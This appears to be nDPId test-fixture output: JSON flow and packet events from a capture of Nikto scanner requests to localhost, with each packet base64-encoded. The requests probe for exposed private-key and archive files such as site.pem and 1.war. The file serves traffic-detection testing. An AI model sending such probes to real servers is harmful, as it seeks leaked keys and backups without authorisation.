00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1576420277014,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277014,"pkt":"AAAAAAAAAAAAAAAACABFAADAIeRAAEAGGlJ\/AAABfwAAAcNCH5DPShmIhuR59oAYAED+tAAAAQEICp1m\/D6dZvw+R0VUIC9zaXRlLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277016,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1576420277016,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277016,"pkt":"AAAAAAAAAAAAAAAACABFAADA415AAEAGWNd\/AAABfwAAAcNEH5AFlNs7Kigy04AYAED+tAAAAQEICp1m\/ECdZvxAR0VUIC9zaXRlLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277016,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277017,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1576420277017,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277017,"pkt":"AAAAAAAAAAAAAAAACABFAADConZAAEAGmb1\/AAABfwAAAcNGH5DVgZoTcsiCOoAYAED+tgAAAQEICp1m\/EGdZvxBR0VUIC8xMjcwMDEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277017,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277019,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1576420277019,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277019,"pkt":"AAAAAAAAAAAAAAAACABFAADCTHZAAEAG771\/AAABfwAAAcNIH5DfPnQTJOA0c4AYAED+tgAAAQEICp1m\/EKdZvxCR0VUIC8xMjcwMDEud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277019,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277020,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1576420277020,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277020,"pkt":"AAAAAAAAAAAAAAAACABFAADCeAVAAEAGxC5\/AAABfwAAAcNKH5DAxUBlVYOEbYAYAED+tgAAAQEICp1m\/ESdZvxER0VUIC8xMjcwMDEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277020,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277021,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1576420277021,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277021,"pkt":"AAAAAAAAAAAAAAAACABFAADC3f5AAEAGXjV\/AAABfwAAAcNMH5AeDOWcmsl5CIAYAED+tgAAAQEICp1m\/EWdZvxFR0VUIC8xMjcwMDEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277021,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277023,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1576420277023,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277023,"pkt":"AAAAAAAAAAAAAAAACABFAAC9\/jtAAEAGPf1\/AAABfwAAAcNOH5DeVcZf0\/y26IAYAED+sQAAAQEICp1m\/EedZvxHR0VUIC8xLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277023,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277025,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1576420277025,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277025,"pkt":"AAAAAAAAAAAAAAAACABFAAC9VlRAAEAG5eR\/AAABfwAAAcNQH5CjGG47rGEO3YAYAED+sQAAAQEICp1m\/EmdZvxJR0VUIC8xLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277025,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277027,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1576420277027,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277027,"pkt":"AAAAAAAAAAAAAAAACABFAADAghpAAEAGuht\/AAABfwAAAcNSH5AdH7pxZz3Y6IAYAED+tAAAAQEICp1m\/EudZvxLR0VUIC8wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277027,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277028,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1576420277028,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277028,"pkt":"AAAAAAAAAAAAAAAACABFAADA6xtAAEAGURp\/AAABfwAAAcNUH5DAadNxZUvEiYAYAED+tAAAAQEICp1m\/EydZvxMR0VUIC8wLnRhci5neiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277028,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277029,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1576420277029,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277029,"pkt":"AAAAAAAAAAAAAAAACABFAADAF9FAAEAGJGV\/AAABfwAAAcNWH5ByeS+n3HjH64AYAED+tAAAAQEICp1m\/E2dZvxNR0VUIC8xMjcwLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277029,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277031,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
